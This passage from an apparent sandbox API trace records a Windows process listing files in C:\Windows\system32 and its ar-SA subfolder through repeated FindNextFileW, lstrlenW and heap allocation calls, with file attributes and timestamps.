cAlternateFileName="")) returned 1 [0027.717] lstrlenW (lpString="ar-SA") returned 5 [0027.717] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x250) returned 0x456140 [0027.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\ar-SA\\*", lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x44e188 [0027.720] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3986c, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x248a328, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x248a328, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0027.720] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd2e2f2c, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcd70d590, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcd70d590, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="cdosys.dll.mui", cAlternateFileName="")) returned 1 [0027.720] lstrlenW (lpString="cdosys.dll.mui") returned 14 [0027.720] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd8641e7, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xcdbaa011, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xcdbaa011, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comctl32.dll.mui", cAlternateFileName="")) returned 1 [0027.720] lstrlenW (lpString="comctl32.dll.mui") returned 16 [0027.720] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc973a95d, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xca5a8e5c, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xca5a8e5c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="comdlg32.dll.mui", cAlternateFileName="")) returned 1 [0027.720] lstrlenW (lpString="comdlg32.dll.mui") returned 16 [0027.721] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc24606e1, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc29bb83d, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc29e199c, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fms.dll.mui", cAlternateFileName="")) returned 1 [0027.721] lstrlenW (lpString="fms.dll.mui") returned 11 [0027.721] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6374c39, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc672ce80, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc672ce80, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mlang.dll.mui", cAlternateFileName="")) returned 1 [0027.721] lstrlenW (lpString="mlang.dll.mui") returned 13 [0027.721] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc578de89, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc5ce8fe5, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc5ce8fe5, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msimsg.dll.mui", cAlternateFileName="")) returned 1 [0027.721] lstrlenW (lpString="msimsg.dll.mui") returned 14 [0027.721] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 1 [0027.721] lstrlenW (lpString="msprivs.dll.mui") returned 15 [0027.721] FindNextFileW (in: hFindFile=0x44e188, lpFindFileData=0x456140 | out: lpFindFileData=0x456140*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4c657b4, ftCreationTime.dwHighDateTime=0x1ca041d, ftLastAccessTime.dwLowDateTime=0xc4f5f320, ftLastAccessTime.dwHighDateTime=0x1ca041d, ftLastWriteTime.dwLowDateTime=0xc4f5f320, ftLastWriteTime.dwHighDateTime=0x1ca041d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="msprivs.dll.mui", cAlternateFileName="")) returned 0 [0027.721] FindClose (in: hFindFile=0x44e188 | out: hFindFile=0x44e188) returned 1 [0027.722] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x456140 | out: hHeap=0x420000) returned 1 [0027.722] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bf02cff, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5bf02cff, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x656df510, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ARP.EXE", cAlternateFileName="")) returned 1 [0027.722] lstrlenW (lpString="ARP.EXE") returned 7 [0027.722] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x90) returned 0x456140 [0027.722] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31c9efbc, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x31c9efbc, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xf2a6d430, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asferror.dll", cAlternateFileName="")) returned 1 [0027.722] lstrlenW (lpString="asferror.dll") returned 12 [0027.722] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x4561d8 [0027.722] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x57090500, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_counters.dll", cAlternateFileName="ASPNET~1.DLL")) returned 1 [0027.722] lstrlenW (lpString="aspnet_counters.dll") returned 19 [0027.722] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa8) returned 0x456280 [0027.722] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84e661b3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84e661b3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84e661b3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="asycfilt.dll", cAlternateFileName="")) returned 1 [0027.722] lstrlenW (lpString="asycfilt.dll") returned 12 [0027.722] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456330 [0027.722] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9839a69, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe9839a69, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x658ceec0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="at.exe", cAlternateFileName="")) returned 1 [0027.722] lstrlenW (lpString="at.exe") returned 6 [0027.723] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x8e) returned 0x4563d8 [0027.723] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaedcb3c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xfaedcb3c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AtBroker.exe", cAlternateFileName="")) returned 1 [0027.723] lstrlenW (lpString="AtBroker.exe") returned 12 [0027.723] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456470 [0027.723] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2b74b, ftCreationTime.dwHighDateTime=0x1ca0418, ftLastAccessTime.dwLowDateTime=0x2d2b74b, ftLastAccessTime.dwHighDateTime=0x1ca0418, ftLastWriteTime.dwLowDateTime=0x805466c0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl.dll", cAlternateFileName="")) returned 1 [0027.723] lstrlenW (lpString="atl.dll") returned 7 [0027.723] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x90) returned 0x456518 [0027.723] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b0b4600, ftCreationTime.dwHighDateTime=0x1cc2787, ftLastAccessTime.dwLowDateTime=0xcc438260, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x4b0b4600, ftLastWriteTime.dwHighDateTime=0x1cc2787, nFileSizeHigh=0x0, nFileSizeLow=0x21b48, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl100.dll", cAlternateFileName="")) returned 1 [0027.723] lstrlenW (lpString="atl100.dll") returned 10 [0027.723] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x4541f8 [0027.723] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29b8ce00, ftCreationTime.dwHighDateTime=0x1ce64f7, ftLastAccessTime.dwLowDateTime=0xef797c80, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0x29b8ce00, ftLastWriteTime.dwHighDateTime=0x1ce64f7, nFileSizeHigh=0x0, nFileSizeLow=0x28248, dwReserved0=0x0, dwReserved1=0x0, cFileName="atl110.dll", cAlternateFileName="")) returned 1 [0027.723] lstrlenW (lpString="atl110.dll") returned 10 [0027.723] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x454298 [0027.723] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9363019e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9363019e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x936562fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmfd.dll", cAlternateFileName="")) returned 1 [0027.723] lstrlenW (lpString="atmfd.dll") returned 9 [0027.723] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x94) returned 0x454338 [0027.723] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9360a03e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9360a03e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9363019e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x8600, dwReserved0=0x0, dwReserved1=0x0, cFileName="atmlib.dll", cAlternateFileName="")) returned 1 [0027.723] lstrlenW (lpString="atmlib.dll") returned 10 [0027.724] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x4543d8 [0027.724] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf3c4130, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0xbf3c4130, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x658f38b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="attrib.exe", cAlternateFileName="")) returned 1 [0027.724] lstrlenW (lpString="attrib.exe") returned 10 [0027.724] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x454478 [0027.724] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4204ec3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb4204ec3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb4204ec3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="audiodev.dll", cAlternateFileName="")) returned 1 [0027.724] lstrlenW (lpString="audiodev.dll") returned 12 [0027.724] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x4565b0 [0027.724] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78f79a81, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x78f79a81, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x80675280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioEng.dll", cAlternateFileName="")) returned 1 [0027.724] lstrlenW (lpString="AudioEng.dll") returned 12 [0027.724] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456670 [0027.724] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce47270e, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xce47270e, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xad59f9a0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x6c200, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUDIOKSE.dll", cAlternateFileName="")) returned 1 [0027.724] lstrlenW (lpString="AUDIOKSE.dll") returned 12 [0027.724] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456718 [0027.724] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87266eb6, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x87266eb6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x87266eb6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2fc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AudioSes.dll", cAlternateFileName="")) returned 1 [0027.724] lstrlenW (lpString="AudioSes.dll") returned 12 [0027.724] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x4567c0 [0027.724] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ceb7bb, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x68ceb7bb, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x35000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditNativeSnapIn.dll", cAlternateFileName="")) returned 1 [0027.724] lstrlenW (lpString="AuditNativeSnapIn.dll") returned 21 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xac) returned 0x458658 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x735a0a8d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x735a0a8d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x65a00190, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpol.exe", cAlternateFileName="")) returned 1 [0027.725] lstrlenW (lpString="auditpol.exe") returned 12 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456868 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a1010d4, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6a1010d4, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80733960, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuditPolicyGPInterop.dll", cAlternateFileName="")) returned 1 [0027.725] lstrlenW (lpString="AuditPolicyGPInterop.dll") returned 24 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xb2) returned 0x458710 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6732ea88, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x6732ea88, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xf6ab4570, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x17400, dwReserved0=0x0, dwReserved1=0x0, cFileName="auditpolmsg.dll", cAlternateFileName="")) returned 1 [0027.725] lstrlenW (lpString="auditpolmsg.dll") returned 15 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa0) returned 0x456910 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08b31c, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xb08b31c, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808b0720, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x51a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="authfwcfg.dll", cAlternateFileName="")) returned 1 [0027.725] lstrlenW (lpString="authfwcfg.dll") returned 13 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9c) returned 0x4569b8 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a14413, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x9a14413, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x808fe920, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x48a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWGP.dll", cAlternateFileName="")) returned 1 [0027.725] lstrlenW (lpString="AuthFWGP.dll") returned 12 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456a60 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aed7d9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9aed7d9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9af4a1bd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4d5000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWSnapin.dll", cAlternateFileName="")) returned 1 [0027.725] lstrlenW (lpString="AuthFWSnapin.dll") returned 16 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa2) returned 0x4587d0 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0eeeaef, ftCreationTime.dwHighDateTime=0x1ca0406, ftLastAccessTime.dwLowDateTime=0xcd1a5500, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0x3931bcc5, ftLastWriteTime.dwHighDateTime=0x1ca0421, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthFWWizFwk.dll", cAlternateFileName="")) returned 1 [0027.725] lstrlenW (lpString="AuthFWWizFwk.dll") returned 16 [0027.725] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0xa2) returned 0x458880 [0027.725] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8acdeb81, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8acdeb81, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8ad04ce2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1b5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="authui.dll", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="authui.dll") returned 10 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x96) returned 0x454518 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x714738cc, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x714738cc, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x80ac71d0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="authz.dll", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="authz.dll") returned 9 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x94) returned 0x4545b8 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85d92e0f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85d92e0f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85f5be93, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="autochk.exe", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="autochk.exe") returned 11 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x98) returned 0x454658 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8332c5e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8332c5e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x83352741, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autoconv.exe", cAlternateFileName="")) returned 1 [0027.726] lstrlenW (lpString="autoconv.exe") returned 12 [0027.726] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x9a) returned 0x456b08 [0027.726] FindNextFileW (in: hFindFile=0x44b288, lpFindFileData=0x44b030 | out: lpFindFileData=0x44b030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cae5ce, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x85cae5ce, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85cd472e, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa0e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="autofmt.exe", cAlternateFileName="")) returned 